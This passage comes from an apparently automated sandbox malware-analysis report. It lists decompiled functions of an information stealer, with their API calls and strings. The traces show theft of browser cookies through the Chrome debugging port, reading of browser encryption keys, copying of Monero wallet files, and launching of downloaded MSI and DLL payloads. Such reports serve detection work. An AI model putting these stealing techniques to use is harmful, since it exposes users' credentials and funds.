                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateGlobalStream
                                      • String ID: image/jpeg
                                      • API String ID: 2244384528-3785015651
                                      • Opcode ID: 9016aef85c15625d9f1fff34047be1f5d7b58c1bae694316245d3ac7eb87dbba
                                      • Instruction ID: d2faa4edc68e733dd4589fee8d589a352f31e3659bf8bf7a4647ab68e46ff6f8
                                      • Opcode Fuzzy Hash: 9016aef85c15625d9f1fff34047be1f5d7b58c1bae694316245d3ac7eb87dbba
                                      • Instruction Fuzzy Hash: 7671A975A24208ABDB14DFE4DD89FEEB778BB48700F10850AF516EB290DB75E904CB60
                                      Function 00AD3080 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00ADAA50: lstrcpy.KERNEL32(00AE0E1A,00000000), ref: 00ADAA98
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 00AD3415
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 00AD35AD
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 00AD373A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExecuteShell$lstrcpy
                                      • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                      • API String ID: 2507796910-3625054190
                                      • Opcode ID: 88630ed3187ed34f7bcbd3e35cb4c26de7c8b97f2038972ed155539116458ec5
                                      • Instruction ID: 7c75bdaf1921a37a421b38c5a23715a9c8c37cbcc66e8c74017e07dc53135a54
                                      • Opcode Fuzzy Hash: 88630ed3187ed34f7bcbd3e35cb4c26de7c8b97f2038972ed155539116458ec5
                                      • Instruction Fuzzy Hash: 4F12EE729101189ACB14EBA0DEA6FEDB739AF24300F40459BE14766291EF746F49CB62
                                      Function 00AC9BE0 Relevance: 19.6, APIs: 8, Strings: 5, Instructions: 146stringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00AC9A50: InternetOpenA.WININET(00AE0AF6,00000001,00000000,00000000,00000000), ref: 00AC9A6A
                                      • lstrcat.KERNEL32(?,cookies), ref: 00AC9CAF
                                      • lstrcat.KERNEL32(?,00AE12C4), ref: 00AC9CC1
                                      • lstrcat.KERNEL32(?,?), ref: 00AC9CD5
                                      • lstrcat.KERNEL32(?,00AE12C8), ref: 00AC9CE7
                                      • lstrcat.KERNEL32(?,?), ref: 00AC9CFB
                                      • lstrcat.KERNEL32(?,.txt), ref: 00AC9D0D
                                      • lstrlen.KERNEL32(00000000), ref: 00AC9D17
                                      • lstrlen.KERNEL32(00000000), ref: 00AC9D26
                                        • Part of subcall function 00ADAA50: lstrcpy.KERNEL32(00AE0E1A,00000000), ref: 00ADAA98
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrlen$InternetOpenlstrcpy
                                      • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                      • API String ID: 3174675846-3542011879
                                      • Opcode ID: 8f37e3214c321abb4dfb1a4da203820d6e075fdba6269399018e5063d6739c85
                                      • Instruction ID: f03812c4f71cc5bd3e52a91ce6a6d1638445f85807ed36c413e87a622b4c553f
                                      • Opcode Fuzzy Hash: 8f37e3214c321abb4dfb1a4da203820d6e075fdba6269399018e5063d6739c85
                                      • Instruction Fuzzy Hash: 66516EB1910618ABCB14EBE0DD9AFEE7738BF14301F404559F20AA7191EF74AA49CF61
                                      Function 00AD5510 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00ADAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00ADAAF6
                                        • Part of subcall function 00AC62D0: InternetOpenA.WININET(00AE0DFF,00000001,00000000,00000000,00000000), ref: 00AC6331
                                        • Part of subcall function 00AC62D0: StrCmpCA.SHLWAPI(?,0154FCB0), ref: 00AC6353
                                        • Part of subcall function 00AC62D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00AC6385
                                        • Part of subcall function 00AC62D0: HttpOpenRequestA.WININET(00000000,GET,?,0154F530,00000000,00000000,00400100,00000000), ref: 00AC63D5
                                        • Part of subcall function 00AC62D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00AC640F
                                        • Part of subcall function 00AC62D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00AC6421
                                        • Part of subcall function 00ADABB0: lstrcpy.KERNEL32(?,00AE0E1A), ref: 00ADAC15
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00AD5568
                                      • lstrlen.KERNEL32(00000000), ref: 00AD557F
                                        • Part of subcall function 00AD8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00AD8FE2
                                      • StrStrA.SHLWAPI(00000000,00000000), ref: 00AD55B4
                                      • lstrlen.KERNEL32(00000000), ref: 00AD55D3
                                      • lstrlen.KERNEL32(00000000), ref: 00AD55FE
                                        • Part of subcall function 00ADAA50: lstrcpy.KERNEL32(00AE0E1A,00000000), ref: 00ADAA98
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                      • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                      • API String ID: 3240024479-1526165396
                                      • Opcode ID: e01004abc80c35ac9639d768b9512737f7f156512ec32cd1586752c39c10ad6f
                                      • Instruction ID: cc8a9e3c15f2671c20910f1b56cce29037896d905ecc980632d53df2a9228fcf
                                      • Opcode Fuzzy Hash: e01004abc80c35ac9639d768b9512737f7f156512ec32cd1586752c39c10ad6f
                                      • Instruction Fuzzy Hash: E451DB70A10148ABCB14EF64CEA6AED7779AF20341F50445AE44767692EF30AF45CB62
                                      Function 00AD1520 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpylstrlen
                                      • String ID:
                                      • API String ID: 2001356338-0
                                      • Opcode ID: 228b61006e8760cd46e17e4529b9288a340357d0b52c546d7b0d20c935c1bcfa
                                      • Instruction ID: a9be3c715da6a760a176a6b018a6425da7bd72c74e61f76cb473f94d601f6ec7
                                      • Opcode Fuzzy Hash: 228b61006e8760cd46e17e4529b9288a340357d0b52c546d7b0d20c935c1bcfa
                                      • Instruction Fuzzy Hash: 7EC183B5900219ABCB14EF60DD99FDE7379BF64304F00459AF40AA7341EA71EA85CFA1
                                      Function 00AD44D0 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00AD8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00AD8F9B
                                      • lstrcat.KERNEL32(?,00000000), ref: 00AD453C
                                      • lstrcat.KERNEL32(?,0154F380), ref: 00AD455B
                                      • lstrcat.KERNEL32(?,?), ref: 00AD456F
                                      • lstrcat.KERNEL32(?,0154D8B0), ref: 00AD4583
                                        • Part of subcall function 00ADAA50: lstrcpy.KERNEL32(00AE0E1A,00000000), ref: 00ADAA98
                                        • Part of subcall function 00AD8F20: GetFileAttributesA.KERNEL32(00000000,?,00AC1B94,?,?,00AE577C,?,?,00AE0E22), ref: 00AD8F2F
                                        • Part of subcall function 00ACA430: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00ACA489
                                        • Part of subcall function 00ACA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00ACA13C
                                        • Part of subcall function 00ACA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00ACA161
                                        • Part of subcall function 00ACA110: LocalAlloc.KERNEL32(00000040,?), ref: 00ACA181
                                        • Part of subcall function 00ACA110: ReadFile.KERNEL32(000000FF,?,00000000,00AC148F,00000000), ref: 00ACA1AA
                                        • Part of subcall function 00ACA110: LocalFree.KERNEL32(00AC148F), ref: 00ACA1E0
                                        • Part of subcall function 00ACA110: CloseHandle.KERNEL32(000000FF), ref: 00ACA1EA
                                        • Part of subcall function 00AD9550: GlobalAlloc.KERNEL32(00000000,00AD462D,00AD462D), ref: 00AD9563
                                      • StrStrA.SHLWAPI(?,0154F2F0), ref: 00AD4643
                                      • GlobalFree.KERNEL32(?), ref: 00AD4762
                                        • Part of subcall function 00ACA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00AC4F3E,00000000,00000000), ref: 00ACA23F
                                        • Part of subcall function 00ACA210: LocalAlloc.KERNEL32(00000040,?,?,?,00AC4F3E,00000000,?), ref: 00ACA251
                                        • Part of subcall function 00ACA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00AC4F3E,00000000,00000000), ref: 00ACA27A
                                        • Part of subcall function 00ACA210: LocalFree.KERNEL32(?,?,?,?,00AC4F3E,00000000,?), ref: 00ACA28F
                                      • lstrcat.KERNEL32(?,00000000), ref: 00AD46F3
                                      • StrCmpCA.SHLWAPI(?,00AE08D2), ref: 00AD4710
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 00AD4722
                                      • lstrcat.KERNEL32(00000000,?), ref: 00AD4735
                                      • lstrcat.KERNEL32(00000000,00AE0FA0), ref: 00AD4744
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                      • String ID:
                                      • API String ID: 3541710228-0
                                      • Opcode ID: 29be228f6a287e17cd1d123672a8271aeb975c3c01c9c9e04dab7a8ea9d200d0
                                      • Instruction ID: 65b398c538f9a60e596fd0c514424f64a67ad3794838313be773e69dab15b692
                                      • Opcode Fuzzy Hash: 29be228f6a287e17cd1d123672a8271aeb975c3c01c9c9e04dab7a8ea9d200d0
                                      • Instruction Fuzzy Hash: D471A6B6910208BBDB14EBA0DD95FEE737DAB98300F004599F60697291EB34EB44CF65
                                      Function 00AC1310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00AC12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00AC12B4
                                        • Part of subcall function 00AC12A0: RtlAllocateHeap.NTDLL(00000000), ref: 00AC12BB
                                        • Part of subcall function 00AC12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00AC12D7
                                        • Part of subcall function 00AC12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00AC12F5
                                        • Part of subcall function 00AC12A0: RegCloseKey.ADVAPI32(?), ref: 00AC12FF
                                      • lstrcat.KERNEL32(?,00000000), ref: 00AC134F
                                      • lstrlen.KERNEL32(?), ref: 00AC135C
                                      • lstrcat.KERNEL32(?,.keys), ref: 00AC1377
                                        • Part of subcall function 00ADAA50: lstrcpy.KERNEL32(00AE0E1A,00000000), ref: 00ADAA98
                                        • Part of subcall function 00ADACC0: lstrlen.KERNEL32(?,01548C58,?,\Monero\wallet.keys,00AE0E1A), ref: 00ADACD5
                                        • Part of subcall function 00ADACC0: lstrcpy.KERNEL32(00000000), ref: 00ADAD14
                                        • Part of subcall function 00ADACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00ADAD22
                                        • Part of subcall function 00ADABB0: lstrcpy.KERNEL32(?,00AE0E1A), ref: 00ADAC15
                                        • Part of subcall function 00AD8CF0: GetSystemTime.KERNEL32(00AE0E1B,0154E890,00AE05B6,?,?,00AC13F9,?,0000001A,00AE0E1B,00000000,?,01548C58,?,\Monero\wallet.keys,00AE0E1A), ref: 00AD8D16
                                        • Part of subcall function 00ADAC30: lstrcpy.KERNEL32(00000000,?), ref: 00ADAC82
                                        • Part of subcall function 00ADAC30: lstrcat.KERNEL32(00000000), ref: 00ADAC92
                                      • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00AC1465
                                        • Part of subcall function 00ADAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00ADAAF6
                                        • Part of subcall function 00ACA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00ACA13C
                                        • Part of subcall function 00ACA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00ACA161
                                        • Part of subcall function 00ACA110: LocalAlloc.KERNEL32(00000040,?), ref: 00ACA181
                                        • Part of subcall function 00ACA110: ReadFile.KERNEL32(000000FF,?,00000000,00AC148F,00000000), ref: 00ACA1AA
                                        • Part of subcall function 00ACA110: LocalFree.KERNEL32(00AC148F), ref: 00ACA1E0
                                        • Part of subcall function 00ACA110: CloseHandle.KERNEL32(000000FF), ref: 00ACA1EA
                                      • DeleteFileA.KERNEL32(00000000), ref: 00AC14EF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                      • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                      • API String ID: 3478931302-218353709
                                      • Opcode ID: 4f757487e564b731472879b09d277de43176b4a0a91bea7bd7b9395e916ef996
                                      • Instruction ID: 1d320301b51f7c32dc2545a04dd20884a9fbdfea0c7d9ddee41c9c6f7feedec5
                                      • Opcode Fuzzy Hash: 4f757487e564b731472879b09d277de43176b4a0a91bea7bd7b9395e916ef996
                                      • Instruction Fuzzy Hash: E25135B1D502185BCB15FB60DE92FED733CAF64700F4045DAB60B62192EE306B89CB66
                                      Function 00AC9A50 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 107networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InternetOpenA.WININET(00AE0AF6,00000001,00000000,00000000,00000000), ref: 00AC9A6A
                                      • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00AC9AAB
                                      • InternetCloseHandle.WININET(00000000), ref: 00AC9AC7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$Open$CloseHandle
                                      • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                      • API String ID: 3289985339-2144369209
                                      • Opcode ID: 9a6c81adac5595dedcc05d2bb34d5d136a1a6cd38b0c0d160268033d48c12230
                                      • Instruction ID: af4166377563329ed4f8cc6540b1c7858ab88b3fc670522b2ef37ae6ebd81f87
                                      • Opcode Fuzzy Hash: 9a6c81adac5595dedcc05d2bb34d5d136a1a6cd38b0c0d160268033d48c12230
                                      • Instruction Fuzzy Hash: 56411D35A50258EBCB14EFA4CD95FDE7774BB48740F10409AF54AAB290CBB4AE80CB64
                                      Function 00AC7630 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00AC7330: memset.MSVCRT ref: 00AC7374
                                        • Part of subcall function 00AC7330: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00AC739A
